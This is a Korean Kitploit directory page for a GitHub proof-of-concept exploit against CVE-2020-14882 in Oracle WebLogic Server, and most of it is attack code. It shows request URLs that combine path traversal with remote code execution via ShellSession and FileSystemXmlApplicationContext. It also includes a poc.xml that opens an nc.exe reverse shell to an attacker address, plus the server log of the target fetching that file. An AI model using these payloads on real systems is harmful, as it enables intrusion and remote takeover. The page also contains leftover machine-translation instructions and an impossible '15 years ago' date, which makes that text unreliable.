Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-14882 — Oracle WebLogic Server의 CVE-2020-14882에 대한 개념 증명 익스플로잇으로, ShellSession 및 FileSystemXmlApplicationContext를 통한 원격 코드 실행과 리버스 셸 페이로드를 시연합니다. | Kitploit
도구/GitHubGitHub/alexfrancow/cve-2020-14882
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlRemote Access Tool
GitHubalexfrancow/cve-2020-14882

CVE-2020-14882

Oracle WebLogic Server의 CVE-2020-14882에 대한 개념 증명 익스플로잇으로, ShellSession 및 FileSystemXmlApplicationContext를 통한 원격 코드 실행과 리버스 셸 페이로드를 시연합니다.

저장소 보기
15년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

는 오직 번역된 Markdown만 출력해야 하며, 추가 설명 없이 바로 시작해야 합니다.

참고로 "CVE-2020-14882"는 취약점 식별자이므로 번역 금지입니다. "calc.exe", "nc.exe", "poc.xml" 등도 그대로 유지합니다.

이제 번역을 작성하겠습니다.# CVE-2020-14882

coherence 쉘 세션 calc.exe

root@kitploit:~
import requests

url = 'http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
              '?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession' \
              '(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)'.format('192.168.1.53', '7001')
response = requests.get(url)

FileSystemXmlApplicationContext를 이용한 nc 리버스 쉘

다음 poc.xml로 웹 서버를 시작합니다:

root@kitploit:~
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>cmd</value>
        <value>/c</value>
        <value>C:\temp\nc.exe 192.168.1.41 4444</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

$ python3 -m http.server

root@kitploit:~
import requests

url = 'http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
              '?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
              '(%22http://192.168.1.41:8000/poc.xml%22)'.format('192.168.1.53', '7001')
response = requests.get(url)
root@kitploit:~
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.53 - - [30/Oct/2020 07:00:12] "GET /poc.xml HTTP/1.1" 200 -
도구 다운로드